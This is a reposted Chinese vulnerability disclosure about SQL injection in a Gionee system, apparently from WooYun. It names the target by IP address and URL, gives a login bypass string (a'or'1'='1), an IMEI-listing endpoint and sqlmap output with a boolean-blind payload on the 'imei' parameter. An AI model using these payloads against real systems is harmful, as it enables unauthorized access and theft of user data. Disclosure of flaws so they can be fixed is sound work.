1. 计算机技术网首页
  2. web服务器教学教程
  3. 企业安全

金立某系统存在SQL注入漏洞,泄露大量用户信息企业安全分享!

企业安全 阅读 0

金立某系统存在SQL注入漏洞,泄露大量用户信息
HQLhttp://218.16.100.212:8080/gionee/

 

金立某系统存在SQL注入漏洞,泄露大量用户信息


HQL

https://218.16.100.212:8080/gionee/

 

金立某系统存在SQL注入漏洞,泄露大量用户信息

用户名admin'
 

金立某系统存在SQL注入漏洞,泄露大量用户信息

HQL

开始构造

 

金立某系统存在SQL注入漏洞,泄露大量用户信息

返回结果太多了

找一个唯一的

用户名a'or'1'='1

密码1234

 

金立某系统存在SQL注入漏洞,泄露大量用户信息

登录成功
 

金立某系统存在SQL注入漏洞,泄露大量用户信息

 

根据 WooYun: 金立某系统漏洞打包可泄漏369万用户IMEI串号(未授权访问/SQL注入)

访问https://218.16.100.212:8080/gionee/weibo/imeiManager!list?p=88&ps=10&time_num=&imei=&startTime=&endTime=

 

金立某系统存在SQL注入漏洞,泄露大量用户信息

 

 https://218.16.100.212:8080/gionee/weibo/imeiManager!list?endTime=&imei=868617028503292&startTime=&time_num=0

sql注入也是存在的

 

 GET parameter 'imei' is vulnerable. Do you want to keep testing the others (if a ny)? [y/N] n sqlmap identified the following injection points with a total of 61 HTTP(s) requ ests: --- Place: GET Parameter: imei     Type: boolean-based blind     Title: AND boolean-based blind - WHERE or HAVING clause     Payload: endTime=&imei=868617028503292%' AND 4568=4568 AND '%'='&startTime=& time_num=0 ---

 

金立某系统存在SQL注入漏洞,泄露大量用户信息

 

www.dengb.comtruehttps://www.dengb.com/qyaq/1100587.htmlTechArticle金立某系统存在SQL注入漏洞,泄露大量用户信息 HQL https://218.16.100.212:8080/gionee/ 用户名admin HQL 开始构造 返回结果太多了 找一个唯一的 用户…

—-想了解更多的企业安全相关处理怎么解决关注<计算机技术网(www.ctvol.com)!!>

本文来自网络收集,不代表计算机技术网立场,如涉及侵权请联系管理员删除。

ctvol管理联系方式QQ:251552304

本文章地址:https://www.ctvol.com/webstt/esecurity/100007.html

(0)
0
上一篇 2020年4月26日
下一篇 2020年4月26日

精彩推荐